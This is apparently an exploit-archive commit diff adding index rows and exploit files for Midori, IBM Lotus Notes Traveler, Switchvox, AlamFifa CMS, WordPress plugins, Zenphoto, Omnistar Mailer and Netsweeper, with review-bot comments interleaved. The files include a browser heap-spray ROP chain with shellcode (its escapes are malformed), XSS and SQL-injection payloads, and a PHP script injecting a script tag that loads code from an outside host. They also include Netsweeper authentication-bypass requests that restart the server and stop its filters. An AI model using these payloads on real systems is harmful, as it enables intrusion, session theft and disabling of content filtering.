DB: 2015-08-22

35 new exploits
Offensive Security 2015-08-22 05:01:36 +00:00
parent 6dccd55e18
commit 40a9571fd7
36 changed files with 2207 additions and 0 deletions


@ -34210,3 +34210,38 @@ id,file,description,date,author,platform,type,port
37893,platforms/windows/dos/37893.py,"Valhala Honeypot 1.8 - Stack-Based Buffer Overflow",2015-08-20,"_ Un_N0n _",windows,dos,21
37894,platforms/php/webapps/37894.html,"Pligg CMS 2.0.2 - Arbitrary Code Execution",2015-08-20,"Arash Khazaei",php,webapps,80
37895,platforms/win64/shellcode/37895.asm,"Win2003 x64 - Token Stealing shellcode - 59 bytes",2015-08-20,"Fitzl Csaba",win64,shellcode,0
37896,platforms/php/webapps/37896.txt,"WordPress ABC Test Plugin 'id' Parameter Cross Site Scripting Vulnerability",2012-09-26,"Scott Herbert",php,webapps,0
37897,platforms/linux/dos/37897.html,"Midori Browser 0.3.2 Denial of Service Vulnerability",2012-09-27,"Ryuzaki Lawlet",linux,dos,0
37898,platforms/windows/local/37898.py,"Reaver Pro Local Privilege Escalation Vulnerability",2012-09-30,infodox,windows,local,0
37899,platforms/php/webapps/37899.txt,"Switchvox Multiple HTML Injection Vulnerabilities",2012-10-02,"Ibrahim El-Sayed",php,webapps,0
37900,platforms/multiple/remote/37900.txt,"IBM Lotus Notes Traveler 8.5.1.x Multiple Input Validation Vulnerabilities",2012-09-28,MustLive,multiple,remote,0
37901,platforms/php/webapps/37901.txt,"AlamFifa CMS 'user_name_cookie' Parameter SQL Injection Vulnerability",2012-09-30,L0n3ly-H34rT,php,webapps,0
37902,platforms/php/webapps/37902.php,"WordPress Akismet Plugin Multiple Cross Site Scripting Vulnerabilities",2012-10-01,"Tapco Security",php,webapps,0
37903,platforms/php/webapps/37903.txt,"Zenphoto 'admin-news-articles.php' Cross Site Scripting Vulnerability",2012-10-02,"Scott Herbert",php,webapps,0
37904,platforms/php/webapps/37904.txt,"Omnistar Mailer Multiple SQL Injection and HTML Injection Vulnerabilities",2012-10-01,"Vulnerability Laboratory",php,webapps,0
37905,platforms/windows/dos/37905.rb,"PowerTCP WebServer for ActiveX Denial of Service Vulnerability",2012-09-28,catatonicprime,windows,dos,0
37907,platforms/php/webapps/37907.txt,"WordPress MDC Private Message Plugin 1.0.0 - Persistent XSS",2015-08-21,"Chris Kellum",php,webapps,80
37909,platforms/windows/dos/37909.txt,"Microsoft Office 2007 wwlib.dll fcPlcfFldMom Uninitialized Heap Usage",2015-08-21,"Google Security Research",windows,dos,0
37910,platforms/windows/dos/37910.txt,"Microsoft Office 2007 wwlib.dll Type Confusion",2015-08-21,"Google Security Research",windows,dos,0
37911,platforms/windows/dos/37911.txt,"Microsoft Office 2007 OGL.dll DpOutputSpanStretch::OutputSpan Out of Bounds Write",2015-08-21,"Google Security Research",windows,dos,0
37912,platforms/windows/dos/37912.txt,"Microsoft Office 2007 MSO.dll Arbitrary Free",2015-08-21,"Google Security Research",windows,dos,0
37913,platforms/windows/dos/37913.txt,"Microsoft Office 2007 MSO.dll Use-After-Free",2015-08-21,"Google Security Research",windows,dos,0
37914,platforms/windows/dos/37914.txt,"Windows win32k.sys TTF Font Processing win32k!fsc_BLTHoriz Out-of-Bounds Pool Write",2015-08-21,"Google Security Research",windows,dos,0
37915,platforms/windows/dos/37915.txt,"Windows win32k.sys TTF Font Processing win32k!fsc_RemoveDups Out-of-Bounds Pool Memory Access",2015-08-21,"Google Security Research",windows,dos,0
37916,platforms/windows/dos/37916.txt,"Windows ATMFD.DLL Out-of-Bounds Read Due to Malformed FDSelect Offset in the CFF Table",2015-08-21,"Google Security Research",windows,dos,0
37917,platforms/windows/dos/37917.txt,"Windows ATMFD.DLL Out-of-Bounds Read Due to Malformed Name INDEX in the CFF Table",2015-08-21,"Google Security Research",windows,dos,0
37918,platforms/windows/dos/37918.txt,"Windows win32k.sys TTF Font Processing win32k!scl_ApplyTranslation Pool-Based Buffer Overflow",2015-08-21,"Google Security Research",windows,dos,0
37919,platforms/windows/dos/37919.txt,"Windows win32k.sys TTF Font Processing IUP[] Program Instruction Pool-Based Buffer Overflow",2015-08-21,"Google Security Research",windows,dos,0
37920,platforms/windows/dos/37920.txt,"Windows ATMFD.DLL Write to Uninitialized Address Due to Malformed CFF Table",2015-08-21,"Google Security Research",windows,dos,0
37921,platforms/windows/dos/37921.txt,"Windows ATMFD.DLL CFF table (ATMFD+0x3440b / ATMFD+0x3440e) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0
37922,platforms/windows/dos/37922.txt,"Windows ATMFD.DLL CFF table (ATMFD+0x34072 / ATMFD+0x3407b) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0
37923,platforms/windows/dos/37923.txt,"Windows ATMFD.DLL CharString Stream Out-of-Bounds Reads",2015-08-21,"Google Security Research",windows,dos,0
37924,platforms/windows/dos/37924.txt,"Microsoft Office 2007 MSPTLS Heap Index Integer Underflow",2015-08-21,"Google Security Research",windows,dos,0
37925,platforms/windows/local/37925.txt,"Mozilla Maintenance Service Log File Overwrite Elevation of Privilege",2015-08-21,"Google Security Research",windows,local,0
37926,platforms/php/webapps/37926.txt,"Netsweeper 2.6.29.8 - SQL Injection",2015-08-21,"Anastasios Monachos",php,webapps,0
37927,platforms/php/webapps/37927.txt,"Netsweeper 4.0.4 - SQL Injection",2015-08-21,"Anastasios Monachos",php,webapps,0
37928,platforms/php/webapps/37928.txt,"Netsweeper 4.0.8 - SQL Injection Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0
37929,platforms/php/webapps/37929.txt,"Netsweeper 4.0.8 - Authentication Bypass Issue",2015-08-21,"Anastasios Monachos",php,webapps,0
37930,platforms/php/webapps/37930.txt,"Netsweeper 4.0.9 - Arbitrary File Upload And Execution",2015-08-21,"Anastasios Monachos",php,webapps,0
37931,platforms/php/webapps/37931.txt,"Netsweeper 3.0.6 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0
37932,platforms/php/webapps/37932.txt,"Netsweeper 4.0.8 - Arbitrary File Upload and Execution",2015-08-21,"Anastasios Monachos",php,webapps,0
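Review bot: two of the added rows disagree with the files they index. Row 37905 describes the entry as "PowerTCP WebServer for ActiveX Denial of Service Vulnerability", but the Metasploit module in 37905.rb names its target "Dart Webserver <= 1.9.0 Stack Overflow" and cites CVE-2012-3819 while the prose in the same file says "PowerTCP WebServer for ActiveX 1.9.2 is vulnerable"; settle on one product name and version range. Row 37897 files the Midori PoC under platforms/linux/dos, yet 37897.html is a Windows heap spray (VirtualProtect ROP chain, calc.exe payload) whose only platform-neutral part is the trailing `for(;true;){(arrobject[0])++;}` trigger, so either the description should say that or the platform should be reconsidered. Smaller points: the Netsweeper rows record port 0 although 37927 and 37931 document the endpoint on :8080, and ids 37906 and 37908 are skipped without any corresponding removal in the hunk.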


platforms/linux/dos/37897.html Executable file

@ -0,0 +1,132 @@
source: http://www.securityfocus.com/bid/55709/info
The Midori Browser is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
Midori Browser 0.3.2 is vulnerable; other versions may also be affected.
it****************************
<html>
<!-- ROP completed--->
<head>
<Title>Ubuntu 11.10 Calc p47l0d -- Rop Completed</title>
<script type="text/javascript">
function ignite() {
var carpet = 0x200;
var vftable = unescape("\x00% u0c10");
var pLand = "% u00fd% u0c10";
var pShell = "% u0000% u0c10";
var oldProt = "% u0000% u0c10";
var heap = unescape("% u0101% u0102"
+"% u0008% u0c10"
+"% u0105% u0106"
+"% u10c2% u7c34"//"% u0107% u0108" pop ecx;pop ecx;ret
+"% u0109% u010a"//
+"% u3134% u6d32"//"% u010b% u010c"//"% u6643% u6d6a" // mov eax,[esi]
+"% u787f% u6d32"//"% u010d% u010e"// xchg eax,esi;aam 0ff;dec ecx;ret
+"% u7b72% u6d83"//"% u010f% u0111" // pop edx;ret
+"% u0000% u0c10"//% u0112% u0113" // will be popped in edx //
+"% u2a30% u6d7f"//"% u0114% u0115" // mov ecx,esi;call [edx+50]
+pLand//"% u0116% u0117" // Address in shellcode to land change it accordingly
+"% ue8d4% u6d7f"//"% u0118% u0119" // mov [ecx],eax;pop ebp;ret
+"% u011a% u011b"// will be popped in ebp
+"% u1b02% u7c34"//"% u011c% u011d" // dec ecx;ret
+"% u1b02% u7c34"//"% u011e% u011f" // dec ecx;ret
+"% u1b02% u7c34"//"% u0120% u0121" // dec ecx;ret
+"% u1b02% u7c34"//"% u0122% u0123" // dec ecx;ret
+"% u4edc% u7c34"//"% u0122% u0123" // pop eax;ret
+oldProt//"% u0124% u0125" // pOldProtection
+"% ue8d4% u6d7f"//"% u0126% u0127" // mov [ecx],eax;pop ebp;ret
+"% u4edb% u7c34"//"% u0128% u0129" // pop ebx;pop eax;ret // needed in initial phase.
+"% u1b02% u7c34"//"% u012a% u012b" // dec ecx;ret
+"% u1b02% u7c34"//"% u012c% u012d" // dec ecx;ret
+"% u4edb% u7c34"//"% u012e% u012f" // pop ebx;pop eax;ret
+"% u2643% u7c34"//"% u0130% u0131" // xchg eax,esp;pop edi;add byte ptr ds:[eax],al;pop ecx,ret
+"% u0040% u0000"//"% u0132% u0133" // newProptection = PAGE_READ_WRITE_EXECUTE
+"% u1b02% u7c34"//"% u0134% u0135" // dec ecx;ret
+"% u1b02% u7c34"//"% u0136% u0137" // dec ecx;ret
+"% ue8d4% u6d7f"//"% u0138% u0139" // mov [ecx],eax;pop ebp;ret
+"% u013a% u013b"// will be popped in ebp
+"% u1b02% u7c34"//"% u013c% u013d" // dec ecx;ret
+"% u1b02% u7c34"//"% u013e% u013f" // dec ecx;ret
+"% u1b02% u7c34"//"% u0140% u0141" // dec ecx;ret
+"% u1b02% u7c34"//"% u0142% u0143" // dec ecx;ret
+"% u4edc% u7c34"//"% u0144% u0145" // pop eax;ret
+"% u0000% u0010"//"% u0146% u0147" // Size
+"% ue8d4% u6d7f"//"% u0148% u0149" // mov [ecx],eax;pop ebp;ret
+"% u014a% u014b"// Will be popped in ebp.
+"% u1b02% u7c34"//"% u014c% u014d" // dec ecx;ret
+"% u1b02% u7c34"//"% u014e% u014f" // dec ecx;ret
+"% u1b02% u7c34"//"% u0150% u0151" // dec ecx;ret
+"% u1b02% u7c34"//"% u0152% u0153" // dec ecx;ret
+"% u4edc% u7c34"//"% u0144% u0145" // pop eax;ret
+pShell//"% u0146% u0147" // Address Of Shellcode block to change protection.
+"% ue8d4% u6d7f"//"% u0148% u0149" // mov [ecx],eax;pop ebp;ret
+"% u014a% u014b"// Will be popped in ebp.
/* +"% u1b02% u7c34"//"% u014c% u014d" // dec ecx;ret
+"% u1b02% u7c34"//"% u014e% u014f" // dec ecx;ret
+"% u1b02% u7c34"//"% u0150% u0151" // dec ecx;ret
+"% u1b02% u7c34"//"% u0152% u0153" // dec ecx;ret
*/ +"% u4cc1% u7c34"//"% u0154% u0155" // pop eax;ret
+"% u9611% u7c34"//"% u0156% u0157" // will be popped in eax. pop edi;pop ebx;pop ebp;ret
+"% u347a% u7c34"//"% u0158% u0159" // push esi;push edi;call eax
+"% u4edc% u7c34"//"% u015a% u015b" // pop eax;ret
+"% u00e0% u0c10"//"% u015c% u015d" // will be popped in eax.
/* Need to fix the ebp for proper landing on shellcode */
+"% uc420% u6d99"// dec ebp;ret
+"% uc420% u6d99"// dec ebp;ret
+"% uc420% u6d99"// dec ebp;ret
+"% uc420% u6d99"// dec ebp;ret
+"% u1f0a% u7c34"//"% u015e% u015f" // mov esp,ecx;mov ecx[eax];mov eax,[eax+4];push eax;ret
+"% u0160% u0161"
+"% u28dd% u7c35"//"% u0162% u0163" // VirtualProtect
+"% u0164% u0165"
+"% u0166% u0167"
+"% u0168% u0169"
+"% u016a% u016b"
+"% u016c% u016d"
)
/* Shellcode : */ +unescape("% u9090% u9090% u9090% u9090"
+"% u585b" // pop ebx;pop eax;
+"% u0a05% u0a13% u9000" // add eax,0a130a
+"% u008b" // mov eax,[eax]
+"% u056a" // push 05
+"% uc581% u0128% u0000" // add ebp,114
+"% u9055" // push ebp;nop
+"% u1505% u04d6% u9000" // add eax,4d615
+"% ud0ff" // call eax
+"% uBBBB% uCCCC% uDDDD% uEEEE"
/* command: */ +"% u6163% u636c% u652e% u6578% u0000% ucccc" // calc.exe
);
var vtable = unescape("\x04% u0c10");
while(vtable.length < 0x10000) {vtable += vtable;}
var heapblock = heap+vtable.substring(0,0x10000/2-heap.length*2);
while (heapblock.length<0x80000) {heapblock += heap+heapblock;}
var finalspray = heapblock.substring(0,0x80000 - heap.length - 0x24/2 - 0x4/2 - 0x2/2);
var spray = new Array();
for (var iter=0;iter<carpet;iter++){
spray[iter] = finalspray+heap;
}
/* vulnerability trigger : */
var arrobject = [0x444444444444];
for(;true;){(arrobject[0])++;}
}
</script>
</head>
<body>
<applet src="test.class" width=10 height=10></applet>
<input type=button value="Object++" onclick="ignite()" />
</body>
</html>
********************Exploit****************************
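Review bot: every escape in the heap block is written as `% u....` with a space after the percent sign (e.g. `"% u0101% u0102"`, `"% ue8d4% u6d7f"`, `"% u28dd% u7c35"`), so `unescape()` leaves the strings as literal text and neither the spray, the ROP chain nor the shellcode is ever decoded; if the file was committed like this the whole ROP section is inert and the only code that does anything is the final `for(;true;){(arrobject[0])++;}` loop, which is the actual denial of service. The gadget addresses (0x7c34xxxx, VirtualProtect at 0x7c3528dd) and the `calc.exe` command string are Windows-specific and have no bearing on a Linux Midori crash, so either drop the spray or label it as a separate Windows target with the module it was taken from. Minor: `<applet src="test.class">` uses `src` where the applet element takes `code`, the `<Title>` open tag does not match the `</title>` close, and the `it****************************` line between the advisory text and `<html>` is a damaged banner.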


@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/55740/info
IBM Lotus Notes Traveler is prone to a URI-redirection vulnerability, multiple HTML-injection vulnerabilities and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user and conduct phishing attacks. Other attacks are also possible.
IBM Lotus Notes Traveler 8.5.3 and prior are vulnerable; other versions may also be affected.
http://www.example.com/servlet/traveler?deviceType=700&redirectURL=javascript:alert(document.cookie)
http://www.example.com/servlet/traveler?deviceType=700&redirectURL=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
http://www.example.com/servlet/traveler?deviceType=700&redirectURL=http://websecurity.com.ua
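Review bot: the version range disagrees with the index: this file says "IBM Lotus Notes Traveler 8.5.3 and prior are vulnerable", while the csv row 37900 is titled "8.5.1.x"; align the two. The three PoCs show `redirectURL` accepting a `javascript:` URI, a `data:text/html;base64,...` URI and an arbitrary external host, so the root cause is an unvalidated redirect target rather than missing output encoding, and the remediation to recommend is a scheme allow-list (http/https only) plus a same-origin or known-host check on the redirect destination.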


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/55689/info
The ABC Test plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
ABC Test 0.1 is vulnerable; other versions may also be affected.
http://www.example.com/blog/wp-admin/admin.php?page=abctest&do=edit&id=%22%3E%3Ch1 %3EXSS%3C/h1
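Review bot: the PoC URL contains a stray space inside the tag, `%3Ch1 %3EXSS`, which a browser will either reject or send as `%20` in the middle of the element name; it should read `%3Ch1%3EXSS%3C/h1%3E`. Because the endpoint is `wp-admin/admin.php?page=abctest`, the reflection is only reachable by a user who is logged in with access to the plugin page, so practical exploitation is a link or CSRF-style lure against an administrator; the write-up should state that requirement.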

platforms/php/webapps/37899.txt Executable file

@ -0,0 +1,25 @@
source: http://www.securityfocus.com/bid/55739/info
Switchvox is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
Switchvox 5.1.2 vulnerable; other versions may also be affected.
Review: Tools -> Sound Manager -> Create sound [Description]
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe>
Review: Tools -> SugarCRM switchboard Panel -> setup [SugarCRM Web URL] [SugarCRM SOAP URL]
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe>
Review: Setup -> Groups -> Create Extension Group [Note]
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe>
Review: Setup -> Outgoing calls -> Create Outgoing Call rule [Note]
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe>
Review: Setup -> Incoming Calls -> Caller DID routes -> Create Single DID Route [Note]
PoC:<iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe>
Review: Setup -> Incoming Calls -> Caller ID Rules -> Create Call transfer Call [Note]
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe>
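Review bot: "Switchvox 5.1.2 vulnerable" is missing "is", and all six PoCs are the same stored payload (`<iframe src="..." onload=alert(document.cookie)></iframe>`) placed into admin-only configuration fields (Sound Manager description, SugarCRM panel URLs, extension group and call-rule notes, DID route notes), so each one needs an authenticated admin to plant it and another admin session to render it; the advisory should say which roles can write and which can view those fields, since that decides whether this is privilege escalation or admin-to-admin only. The iframe points at a live third-party host; `src="about:blank"` demonstrates the same thing without the external fetch.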


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/55746/info
AlamFifa CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AlamFifa CMS 1.0 Beta is vulnerable; other versions may also be affected.
user_name_cookie=test' LIMIT 0,1 UNION ALL SELECT 93,93,CONCAT(0x3a6b63733a,0x50766e44664451645753,0x3a6165683a),93,93,93#;
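Review bot: the injection point is a cookie value (`user_name_cookie`), but the file never names the script that reads that cookie, so the PoC cannot be replayed as written; add the request path and method. The payload is a Havij-style UNION with seven columns and marker strings (0x3a6b63733a decodes to ":kcs:", 0x3a6165683a to ":aeh:") that only make sense with the matching column count, and the trailing `;` after `#` is dead because `#` already comments out the rest of the MySQL statement.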

platforms/php/webapps/37902.php Executable file

@ -0,0 +1,37 @@
source: http://www.securityfocus.com/bid/55749/info
The Akismet plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
#!/usr/bin/php -f
<?php
#
# legacy.php curl exploit
#
//
// HTTP POST,
//
$target = $argv[1];
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL,
"http://$target/wp-content/plugins/akismet/legacy.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE
5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,
"s=%2522%253E%253Cscript%2520src%253d%2F%2Fsantanafest.com.br%2Fenquete%2Fc%253E%253C%2Fscript%253E");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
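Review bot: the `CURLOPT_USERAGENT` literal is split across two source lines ("Mozilla/4.0 (compatible; MSIE" on one line and "5.01; Windows NT 5.0)" on the next), which embeds a newline in the User-Agent value; libcurl will refuse or mangle a header containing CR/LF, so join the string on one line. The POST body loads a script from a third-party host (`%2F%2Fsantanafest.com.br%2Fenquete%2Fc`) instead of an inert local payload; for a reproducible PoC use an inline `alert` and keep the double URL encoding (`%2522%253E...`), since that is the property being demonstrated against legacy.php. `$argv[1]` is used without a check, so running the script with no argument sends the request to `http:///wp-content/plugins/akismet/legacy.php`.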


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/55755/info
Zenphoto is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Zenphoto 1.4.3.2 is vulnerable; prior versions may also be affected.
http://www.example.com/zp-core/zp-extensions/zenpage/admin-news-articles.php?date=%22%3E%3Cscript%3Ealert%28%27Cookie%20sealing%20Javascript%27%29;%3C/script%3E%3C>
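Review bot: the PoC URL ends in `%3C/script%3E%3C>`, where the final `%3C>` is a stray fragment that reflects as a bare `<>` and breaks copy-and-paste; truncate after `%3C/script%3E`. The target `zp-core/zp-extensions/zenpage/admin-news-articles.php` lives under the admin tree, so the reflected `date` parameter only fires for an authenticated Zenphoto administrator; the advisory should state the privilege needed.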

platforms/php/webapps/37904.txt Executable file

@ -0,0 +1,25 @@
source: http://www.securityfocus.com/bid/55760/info
Omnistar Mailer is prone to multiple SQL-injection vulnerabilities and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, execute HTML and script code in the context of the affected site, and steal cookie-based authentication credentials; other attacks are also possible.
Omnistar Mailer 7.2 is vulnerable; other versions may also be affected.
http://www.example.com/mailertest/admin/responder.php?op=edit&id=-37'+Union+Select+version(),2,3--%20-#[SQLi]
http://www.example.com/mailer/admin/preview.php?id=-2'+union+Select+1--%20-[SQLi]
http://www.example.com/mailer/admin/pages.php?form_id=-2'+Union+Select+version(),2,3--%20-#%20-&op=list[SQLi]
http://www.example.com/mailer/admin/navlinks.php?op=edit&nav_id=9''+Union+Select+version(),2,3--%20-#[SQLi]
http://www.example.com/mailertest/users/register.php?nav_id=-18'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20-[SQLi]
http://www.example.com/mailertest/admin/pages.php?op=edit&id=16&form_id=2&apos;[SQLi]
http://www.example.com/mailertest/admin/contacts.php?op=edit&id=3&form_id=2&apos;[SQLi]
http://www.example.com/mailertest/users/index.php?profile=1&form_id=2&apos;[SQLi]
http://www.example.com/mailertest/users/register.php?form_id=2&apos;[SQLi]
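Review bot: the five PoCs ending in `&apos;[SQLi]` are not valid injection strings: `&apos;` is an HTML entity, so a browser sends it verbatim and the server parses it as an extra parameter named `apos;`, and no quote character ever reaches the query; they should use `%27`. The remaining entries alternate between `/mailertest/` and `/mailer/` prefixes and between `-#` and `--%20-` terminators, so it is unclear which install path the product uses; normalise to one path, drop the `[SQLi]` suffix from the URLs, and state the DBMS (the `version()` calls imply MySQL).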

platforms/php/webapps/37907.txt Executable file

@ -0,0 +1,29 @@
# Exploit Title: WordPress MDC Private Message Persistent XSS
# Date: 8/20/15
# Exploit Author: Chris Kellum
# Vendor Homepage: http://medhabi.com/
# https://wordpress.org/plugins/mdc-private-message/
# Version: 1.0.0
=====================
Vulnerability Details
=====================
The 'message' field doesn't sanitize input, allowing a less privileged user (Editor, Author, etc.)
to execute an XSS attack against an Administrator.
Proof of Concept:
Place <script>alert('Hello!')</script> in the message field of a private message and then submit.
Open the message and the alert window will fire.
===================
Disclosure Timeline
===================
8/16/15 - Vendor notified.
8/19/15 - Version 1.0.1 released.
8/20/15 - Public Disclosure.
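Review bot: the header lists Version 1.0.0 but the timeline shows the fix shipped as 1.0.1 on 8/19/15; add a "Fixed in: 1.0.1" line to the header so readers do not have to infer it from the timeline. The PoC names the `message` field but not the request that submits it or the template that renders it, and since the attack is Author-to-Administrator the dangerous sink is the administrator's inbox view; identifying that file would let a maintainer verify the 1.0.1 fix actually escapes output there.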

platforms/php/webapps/37926.txt Executable file

@ -0,0 +1,40 @@
+-------------------------------------+
+ Netsweeper 2.6.29.8 - SQL Injection +
+-------------------------------------+
Affected Product: Netsweeper
Vendor Homepage : www.netsweeper.com
Version : 2.6.29.8 (and probably other versions)
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
Patched : Yes
CVE : CVE-2014-9613
+---------------------+
+ Product Description +
+---------------------+
Netsweeper is a software solution specialized in content filtering.
+----------------------+
+ Exploitation Details +
+----------------------+
Two specific parameters in two pages of Netsweeper Content Filtering solution v2.6.29.8 (and probable earlier versions) are vulnerable to SQL injection.
Condition: The exploitation can be performed by any non-authenticated user with access to the vulnerable pages (usually from everyone).
Vulnerability Type: SQL Injection [SQLi-I]
Vulnerable Page I: http://netsweeper/webadmin/auth/verification.php
Vulnerable POST Parameter: login
Vulnerability Type: SQL Injection [SQLi-II]
Vulnerable Page II: http://netsweeper/webadmin/deny/index.php
Vulnerable POST Parameter: dpid
+----------+
+ Solution +
+----------+
Upgrade to latest version.
+---------------------+
+ Disclosure Timeline +
+---------------------+
12-Jan-2011: Netsweeper fixed issue on 2.6.29.10
17-Jan-2015: CVE assigned CVE-2014-9613
11-Aug-2015: Public disclosure
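Review bot: the timeline says the fix landed in 2.6.29.10 on 12-Jan-2011, four years before the CVE assignment and this publication, but the Solution section only says "Upgrade to latest version"; put the fixed release there. Both findings name only the page and POST parameter (`login` on webadmin/auth/verification.php, `dpid` on webadmin/deny/index.php) with no example payload or observable response, so the advisory cannot be reproduced independently; one boolean or time-based payload per parameter would be enough.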

platforms/php/webapps/37927.txt Executable file

@ -0,0 +1,40 @@
+----------------------------------+
+ Netsweeper 4.0.4 - SQL Injection +
+----------------------------------+
Affected Product: Netsweeper
Vendor Homepage : www.netsweeper.com
Version : 4.0.4 (and probably other versions)
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
Patched : Yes
CVE : CVE-2014-9612
+---------------------+
+ Product Description +
+---------------------+
Netsweeper is a software solution specialized in content filtering.
+----------------------+
+ Exploitation Details +
+----------------------+
Once specific parameter in Netsweeper 3.0.6, 4.0.3 and 4.0.4 (and probably other versions) was identified being vulnerable to SQL injection attacks.
Condition: The exploitation can be performed by any non-authenticated user with access to the vulnerable pages (usually from everyone).
Vulnerable Page: http://netsweeper:8080/remotereporter/load_logfiles.php?server=<SQLi>&url=a
Vulnerable GET Parameter: server
+----------+
+ Solution +
+----------+
Upgrade to latest version.
+---------------------+
+ Disclosure Timeline +
+---------------------+
24-Nov-2014: Initial Communication
03-Dec-2014: Netsweeper responded
03-Dec-2014: Shared full details to replicate the issue
10-Dec-2014: Netsweeper fixed the issue in releases 3.1.10, 4.0.9, 4.1.2
17-Dec-2014: New releases 3.1.10, 4.0.9, 4.1.2 made available to the public
18-Dec-2014: Confirm fix
17-Jan-2015: CVE assigned CVE-2014-9612
11-Aug-2015: Public disclosure
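Review bot: "Once specific parameter" should read "One specific parameter", and the affected list in the body (3.0.6, 4.0.3 and 4.0.4) is wider than the 4.0.4 in the title and header; either widen the header or say why only 4.0.4 was confirmed. The vulnerable URL runs on port 8080 (`http://netsweeper:8080/remotereporter/load_logfiles.php?server=<SQLi>&url=a`), which the csv row records as port 0. The fixed releases 3.1.10, 4.0.9 and 4.1.2 appear only in the timeline and should be repeated under Solution.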

platforms/php/webapps/37928.txt Executable file

@ -0,0 +1,56 @@
+----------------------------------------------------------------+
+ Netsweeper 4.0.8 - SQL Injection Authentication Bypass (Admin) +
+----------------------------------------------------------------+
Affected Product: Netsweeper
Vendor Homepage : www.netsweeper.com/
Version : 4.0.8 (and probably other versions)
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
Patched : Yes
CVE : CVE-2014-9605
+---------------------+
+ Product Description +
+---------------------+
Netsweeper is a software solution specialized in content filtering.
+----------------------+
+ Exploitation Details +
+----------------------+
By adding two single-quotes in an specific HTTP request, it forces Netsweeeper 4.0.8 (and probably other versions) to authenticate us as admin. The access gives us the ability to:
i) "Back Up the System" which creates a downloadable system backup tarball file (containing the whole /etc /usr and /var folders)
ii) "Restart" the server
iii) "Stop the filters on the server"
Vulnerability Type: Authentication Bypass (using two single-quotes)
p0c: http://netsweeper/webupgrade/webupgrade.php
POST: step=&login='&password='&show_advanced_output=
p0c restart the server:
http://netsweeper/webupgrade/webupgrade.php
POST: step=12&login='&password='&show_advanced_output=
followed by
http://netsweeper/webupgrade/webupgrade.php HTTP/1.1
POST: step=12&restart=yes&show_advanced_output=false
p0c stop the filters on the server:
http://netsweeper/webupgrade/webupgrade.php
POST: step=9&stopservices=yes&show_advanced_output=
+----------+
+ Solution +
+----------+
Upgrade to latest version.
+---------------------+
+ Disclosure Timeline +
+---------------------+
24-Nov-2014: Initial Communication
03-Dec-2014: Netsweeper responded
03-Dec-2014: Shared full details to replicate the issue
10-Dec-2014: Netsweeper fixed the issue in releases 3.1.10, 4.0.9, 4.1.2
17-Dec-2014: New releases 3.1.10, 4.0.9, 4.1.2 made available to the public
18-Dec-2014: Confirm fix
17-Jan-2015: CVE assigned CVE-2014-9605
11-Aug-2015: Public disclosure
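Review bot: the follow-up requests depend on session state the PoC never mentions: the restart sequence sends `step=12&login='&password='` and then `step=12&restart=yes&show_advanced_output=false`, and the stop-filters request (`step=9&stopservices=yes&show_advanced_output=`) carries no login parameters at all, so they only work if the client replays the session cookie issued by the first bypass request; say that cookies must be preserved between requests. "two single-quotes" means one quote in each of `login` and `password`; the write-up shows neither the affected query nor the response that proves an admin session was granted, so add the response. As in the sibling advisories, the fixed releases 3.1.10, 4.0.9 and 4.1.2 are only in the timeline, not under Solution.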

